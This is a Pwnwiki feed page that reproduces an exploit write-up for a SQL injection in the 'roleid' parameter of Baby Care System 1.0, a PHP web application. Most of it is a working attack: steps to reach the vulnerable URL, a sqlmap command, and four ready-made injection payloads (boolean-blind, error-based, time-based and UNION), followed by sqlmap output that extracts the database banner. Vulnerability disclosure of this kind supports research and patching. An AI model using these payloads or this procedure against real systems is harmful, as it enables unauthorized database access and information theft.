https://pwnwiki.com/index.php?action=history&feed=atom&title=Baby_Care_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
Baby Care System 1.0 SQL注入漏洞 - Revision history
2026-04-08T00:03:47Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Baby_Care_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1307&oldid=prev
Pwnwiki: Created page with "==INFO== <pre> # Exploit Title: Baby Care System 1.0 - 'roleid' SQL Injection # Exploit Author: Vijay Sachdeva # Date: 2020-12-23 # Vendor Homepage: https://www.sourcecodester..."
2021-04-09T08:53:27Z
<p>Created page with "==INFO== <pre> # Exploit Title: Baby Care System 1.0 - 'roleid' SQL Injection # Exploit Author: Vijay Sachdeva # Date: 2020-12-23 # Vendor Homepage: https://www.sourcecodester..."</p>
<p><b>New page</b></p><div>==INFO==<br />
<pre><br />
# Exploit Title: Baby Care System 1.0 - 'roleid' SQL Injection<br />
# Exploit Author: Vijay Sachdeva<br />
# Date: 2020-12-23<br />
# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html<br />
# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+<br />
# Affected Version: Version 1<br />
# Tested on Kali Linux<br />
<br />
Step 1. Log in to the application with admin credentials.<br />
<br />
Step 2. Click on "MENUS" on the left side and then edit any "Page Role".<br />
<br />
Step 3. On the edit page, the URL should be: http://localhost/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7<br />
<br />
Step 4. Run sqlmap on the URL where the "roleid" parameter is given<br />
<br />
sqlmap -u "<br />
http://192.168.1.240/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7"<br />
--banner<br />
<br />
---<br />
<br />
Parameter: roleid (GET)<br />
<br />
Type: boolean-based blind<br />
<br />
Title: AND boolean-based blind - WHERE or HAVING clause<br />
<br />
Payload: id=pagerole&action=edit&roleid=8' AND 3077=3077 AND<br />
'IPDn'='IPDn<br />
<br />
<br />
Type: error-based<br />
<br />
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />
BY clause (FLOOR)<br />
<br />
Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 2834 FROM(SELECT<br />
COUNT(*),CONCAT(0x7170767871,(SELECT<br />
(ELT(2834=2834,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM<br />
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jnFT'='jnFT<br />
<br />
<br />
Type: time-based blind<br />
<br />
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />
<br />
Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 4559 FROM<br />
(SELECT(SLEEP(5)))jaEa) AND 'iBGT'='iBGT<br />
<br />
<br />
Type: UNION query<br />
<br />
Title: Generic UNION query (NULL) - 4 columns<br />
<br />
Payload: id=pagerole&action=edit&roleid=-2488' UNION ALL SELECT<br />
CONCAT(0x7170767871,0x7577594366596d7077424f5746685366434a5244775565756b7a41566d63546c5156564e6d67556e,0x71717a6271),NULL,NULL,NULL--<br />
-<br />
<br />
---<br />
<br />
[05:32:00] [INFO] the back-end DBMS is MySQL<br />
<br />
[05:32:00] [INFO] fetching banner<br />
<br />
back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />
<br />
banner: '10.3.24-MariaDB-2'<br />
<br />
---<br />
<br />
[08:18:34] [INFO] the back-end DBMS is MySQL<br />
<br />
[08:18:34] [INFO] fetching banner<br />
<br />
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />
<br />
banner: '10.3.24-MariaDB-2'<br />
<br />
<br />
---<br />
<br />
Step 5. Sqlmap should inject the web-app successfully which leads to information disclosure.<br />
</pre></div>
Pwnwiki